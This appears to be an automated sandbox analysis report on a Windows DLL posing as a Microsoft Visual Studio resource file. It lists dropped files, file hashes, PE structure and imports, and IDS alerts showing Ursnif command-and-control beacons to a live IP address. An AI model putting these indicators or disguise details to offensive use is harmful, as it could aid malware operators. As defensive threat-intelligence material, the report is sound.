Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otFlat[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12282
Entropy (8bit):	5.246783630735545
Encrypted:	false
SSDEEP:	192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
MD5:	A7049025D23AEC458F406F190D31D68C
SHA1:	450BC57E9C44FB45AD7DC826EB523E85B9E05944
SHA-256:	101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
SHA-512:	EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
Malicious:	false
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCIgcm9sZT0iZGlhbG9nIiBhcmlhLWRlc2NyaWJlZGJ5PSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gzPjxwIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+dGl0bGU8L3A+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRhaW5lciI+PGgzIGNsYXNzPSJvdC1kcGQtdGl0bGUiPldlIGNvbGxlY3QgZGF0YSBpbiBvcmRlciB0byBwcm92aWRlOjwvaDM+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRlbnQiPjxwIGNsYXNzPSJvdC1kcGQtZGVzYyI+ZGVzY3JpcHRpb248L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwLXBhcmVudCIgY2xhc3M9Im90LXNkay10aHJlZSBvdC1zZGstY29sdW1ucyI+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwIj48YnV0dG9uIGlkPSJvbmV0cnVzdC1wYy1idG4taGFuZGxlciI+Y2h

C:\Users\user\AppData\Local\Temp\~DF089A6B92B8B468A8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40145
Entropy (8bit):	0.6701756284503325
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+8aAhKYULj0RDULj0R/Lj0R4:kBqoxKAuqR+8aAhKYUiDUi/i4
MD5:	D10B58FB2B6CC42B14F0CAA6109D35D9
SHA1:	7C4DD9B67385608F680AA598C73B861052F46364
SHA-256:	99640F412051958EB30C72A3C6E8577787BE272018E2CA64413679783A9B503A
SHA-512:	99189539CB976BB1960C2D2D7EC8A55EBD148F613219958409619F78AEB8A9745CDC92D9F7213F49DB16E9A392AB579A009C5B9D8ECC3F95447BCA1F4B594FEB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3C0DFDDDFC29F1F0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	206905
Entropy (8bit):	3.188827823757322
Encrypted:	false
SSDEEP:	3072:BZ/2Bfc/mu5kgTzXtOZ/2Bfcgmu5kgTzXt:os
MD5:	869692B8C38793BF86553770719420A6
SHA1:	07863CED17458E87F3812F43DB819BF2452F3EDC
SHA-256:	A947B7DE4263C072911F49633622C57F6F410CB407AC001DFFD4CBD353D2C64A
SHA-512:	F72DD03CCFB83EFF5786C252C2ABDCB1B93CC320E25C908F008E9ED0EC60E1A0FE72C65A03635D05D55AED70A55524DAE061261290370080EEBD714BDEFB8EC6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAFF8881E6374BF6C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40145
Entropy (8bit):	0.6726419762098381
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+djBgDpUtE+dmUtE+dytE+dP:I+q+R+d
MD5:	9005A95824951F329518946B184A9060
SHA1:	EB5C50650C2C312598B23B9E88D73DB3F5891B0E
SHA-256:	E0EFCF10C99E81F34A01EC86CA433304B48124DCF15790BD6443C12CE1E557D3
SHA-512:	3198A8FEFC69562052C25C03AA2CC4F138853D07686BFC5F729C9FBD0B99C2AF66581110CEF6880A116DFAFC5CA1DA8153F88062BAA1E2B0A40BACB1E950D9EC
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBF4FFB19552D8CDC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40081
Entropy (8bit):	0.6589262817099075
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+1bZILylTvRBDiPBlTvRBDiPOlTvRBDiPL:kBqoxKAuqR+1bZILypOppOmpOj
MD5:	157E218DDDB0759510916DD5507BA3F4
SHA1:	283C064763F0ED9F8D687F7676A94A48F340B579
SHA-256:	CF9371762CC265E0E1E00F36E257B8327B3AD3806A34617E1789BBA6A78EAA42
SHA-512:	AA69FA7C69604B65DF125E70D45EFFD4000688E50656F7637180CA0D65150F80F90809B91825DCEAA5D3E7C365E0346BEBC372746E8CD85D1A66AC0EDEDE00E7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCE6F4D6F07D43360.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29745
Entropy (8bit):	0.2920107282763179
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
MD5:	CE909A43525B3843C907DCBE55E9D7DD
SHA1:	8B6E53CCBAAB132FF8100ECB696282F011402047
SHA-256:	540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
SHA-512:	027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD54DA9B6AE4A4ED1.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14389
Entropy (8bit):	1.177619819064975
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lou9loe9lWtmxm/hN61r/7N1A1ON6111ypt1Oh166pEhEM:kBqoIp/As/erTQSe/Sc6CYjRKugDddCn
MD5:	90ED921D6119706D2E73DAAE37137388
SHA1:	C8EEF38600EB027B5708951DAEAF024DA73A3B3F
SHA-256:	2EB0B2A8BF64388C5178ED3FD6A5BA7A950EE6709E2A5D83E527CC8DCFB0B143
SHA-512:	91A1709C66678C5B0885D252D5CBAB4418B5EECD8C467B867C7E2E2B67363C6A7C510B61ABB7A863617A3607FD7EAA2F1E2FA991BFD683052DDB4027BB52F8C1
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF3589949295E4D6F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40145
Entropy (8bit):	0.6709723692833666
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+EiIZCgUo3FczUo3Fcvo3Fco:kBqoxKAuqR+EiIZCgU6cU6M65
MD5:	12D730B6E2F7F0CFE55709E9F52E1EC6
SHA1:	4B33D6037E10923274B941B044ECAE09A1C256A1
SHA-256:	BA2C09AD339D7C7CD75EAAEF7159DC681348752C294822CB06F2562D0FC3E9DD
SHA-512:	15F4886F3B49396A2AAC5DBC97EC9F0AF8EEB94E9BFC6093DDDC5B38CE33842CFE73FA6F69AB232CF69EF29D94E21441DD3A2B3236BA143E1EA82F5482F39AC8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy) Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1729259632534914
Encrypted:	false
SSDEEP:	48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
MD5:	0359DFE39C0A15ACE4F9E8A86C9DA83F
SHA1:	EFF33017BB99DC65666013F135EC0DEEB164F4ED
SHA-256:	291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
SHA-512:	26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>....;.p......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.GSkn....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.GSsn..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JGSrn.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............PU......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARUU92NEV262I79KAFPG.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	5149
Entropy (8bit):	3.1729259632534914
Encrypted:	false
SSDEEP:	48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
MD5:	0359DFE39C0A15ACE4F9E8A86C9DA83F
SHA1:	EFF33017BB99DC65666013F135EC0DEEB164F4ED
SHA-256:	291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
SHA-512:	26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>....;.p......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.GSkn....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.GSsn..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JGSrn.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............PU......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NUIAG1F98M3TYTKEDYOI.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1729259632534914
Encrypted:	false
SSDEEP:	48:jdiwPRfI9C9GrIoClyAsASF0diwPRfI9h683GrIoClyAczTdiwPRfI9x9GrIoClR:BPRfL9SGyAJTPRfo3SGyAGPRfc9SGyAf
MD5:	0359DFE39C0A15ACE4F9E8A86C9DA83F
SHA1:	EFF33017BB99DC65666013F135EC0DEEB164F4ED
SHA-256:	291122EF21B25EE009216E42963D0F71F7E60B7EEBB3603A5E4C96B7A5E6DB78
SHA-512:	26FB952FD75375C9D17BE34DD5DF906B9602AA7CB06FCF4BC4F50E9D4F65DFCE8E64DF3F5774FD8D09E6562B81215609559C80B12B275C30877BBC5648D06ED5
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>....;.p......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.GSkn....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.GSsn..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JGSrn.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............PU......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.700886953717853
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	a04.dll
File size:	389632
MD5:	a04cc72f0946720cc875ed228f565c1d
SHA1:	58b12ddffb7015e8857209c60a06ed4419a23641
SHA256:	e04823c56b627e74c92656340de38aed9804af65040bbed746b206de5a122dc5
SHA512:	dd899e5fab849ec5e27408597b39ff009866304a1d9b1a4e3ce126b72c25155fd379cbb6395e74f7a05b2d6a5f46bf17d631e261d90e778c791f7cb8543ebc32
SSDEEP:	6144:pguK47sx+R4DNoapfo2LnHhKiVbI9hrse5Sa3/02sIYzfThE:pguhxwo2okbihRSI/rsdfThE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>p..P#..P#..P#...#..P#...##.P#...#..P#...#..P#..Q#*.P#...#..P#...#..P#...#..P#...#..P#Rich..P#........PE..L....(.U...........

File Icon


Icon Hash:	928094968e869ed2

Static PE Info

General
Entrypoint:	0x403d11
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5514280C [Thu Mar 26 15:38:52 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a554a8c84a5b556026c60d682c670603

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F34C0AD4A07h
call 00007F34C0ADACE0h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F34C0AD4A0Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 0044B6B8h
call 00007F34C0AD6345h
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F34C0AD4A0Eh
cmp dword ptr [0044E588h], esi
je 00007F34C0AD4AEAh
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F34C0AD4A07h
cmp esi, 02h
jne 00007F34C0AD4A37h
mov ecx, dword ptr [004430B8h]
test ecx, ecx
je 00007F34C0AD4A0Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F34C0AD4AB7h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F34C0AD4816h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F34C0AD4AA0h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F34C0AE545Fh
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F34C0AD4A2Ah
test edi, edi
jne 00007F34C0AD4A26h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F34C0AE5447h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F34C0AD47DCh
mov eax, dword ptr [004430B8h]
test eax, eax
je 00007F34C0AD4A09h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:

[EXP] VS2013 UPD3 build 30723
[LNK] VS2013 UPD3 build 30723
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4bba0	0x4c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4bbec	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x560000	0x10e90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x571000	0x1c80	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x42270	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b048	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x42000	0x214	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4013b	0x40200	False	0.751941703216	data	6.83409400376	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x42000	0xa7e8	0xa800	False	0.535505022321	data	5.68603541384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4d000	0x512420	0x1600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x560000	0x10e90	0x11000	False	0.156264361213	data	5.12897604269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x571000	0x1c80	0x1e00	False	0.755208333333	data	6.58165390017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x560650	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512	English	United States
RT_GROUP_ICON	0x570e78	0x14	data	English	United States
RT_VERSION	0x560130	0x3a0	data	English	United States
RT_MANIFEST	0x5604d0	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	HeapFree, CreateDirectoryW, VirtualFree, GetSystemTimeAsFileTime, LoadLibraryW, Sleep, HeapCreate, HeapValidate, SetSystemPowerState, CreateFileW, GetTempPathW, VirtualAlloc, VirtualProtectEx, ResetEvent, GetLocalTime, DeviceIoControl, VirtualProtect, DeleteFileW, WriteConsoleW, SetFilePointerEx, GetConsoleCP, FlushFileBuffers, GetCurrentProcess, ReadConsoleW, GetConsoleMode, ReadFile, LCMapStringW, GetStringTypeW, HeapReAlloc, OutputDebugStringW, GetOEMCP, GetACP, IsValidCodePage, LoadLibraryExW, GetModuleHandleW, HeapAlloc, GetCPInfo, FindFirstChangeNotificationW, SetStdHandle, HeapCompact, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, SetEndOfFile, SetLastError, EncodePointer, DecodePointer, GetCommandLineA, GetCurrentThreadId, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle
USER32.dll	GetClientRect, GetSysColorBrush, CreatePopupMenu, CheckDlgButton, GetDesktopWindow, EndDialog, CreateDialogIndirectParamW, OffsetRect, LoadIconW, DefWindowProcW, GetPropW, SetWindowTextW, UnregisterHotKey, BeginDeferWindowPos, DeferWindowPos, LoadBitmapW, CloseClipboard, GetWindowRect, MapDialogRect, GetMessageW, RegisterWindowMessageW, DialogBoxIndirectParamW, IsDialogMessageW, CreateMenu, GetIconInfo, TranslateMessage, GetForegroundWindow, SendMessageTimeoutW
GDI32.dll	SetViewportExtEx, OffsetViewportOrgEx, ScaleWindowExtEx, ScaleViewportExtEx
ole32.dll	OleSetContainedObject, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, CoCreateInstance
WININET.dll	InternetOpenW, InternetReadFile, InternetConnectW, HttpSendRequestW, InternetSetOptionW, HttpAddRequestHeadersW, HttpQueryInfoW, HttpOpenRequestW, InternetCloseHandle

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x414f90

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	vsmsoui.dll
FileVersion	8.0.60727.58 (RTM.060727-6800)
CompanyName	Microsoft Corporation
ProductName	Microsoft Visual Studio 2007
ProductVersion	8.0.60727.58
FileDescription	Development Environment VSMSO Resource DLL
OriginalFilename	vsmsoui.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/07/21-15:51:52.671546	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51726	8.8.8.8	192.168.2.4
10/07/21-15:53:08.238803	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49936	80	192.168.2.4	87.106.18.141
10/07/21-15:53:08.238803	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49936	80	192.168.2.4	87.106.18.141
10/07/21-15:53:29.599541	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49961	80	192.168.2.4	87.106.18.141
10/07/21-15:53:29.599541	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49961	80	192.168.2.4	87.106.18.141
10/07/21-15:53:34.574084	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49965	80	192.168.2.4	87.106.18.141
10/07/21-15:54:06.183676	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49997	80	192.168.2.4	87.106.18.141
10/07/21-15:54:06.183676	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49997	80	192.168.2.4	87.106.18.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 15:51:46.810334921 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.810388088 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.810781956 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.810812950 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.810902119 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.810915947 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.812097073 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.812131882 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.812454939 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.812484980 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.858057022 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.858196974 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.861540079 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.861634016 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.871742010 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.871781111 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.872185946 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.872332096 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.872354984 CEST	49776	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.885422945 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.885447979 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.885704041 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.885831118 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:51:46.899688005 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.899792910 CEST	443	49776	104.20.184.68	192.168.2.4
Oct 7, 2021 15:51:46.899848938 CEST	49776	443	192.168.2.4	104.20.184.68
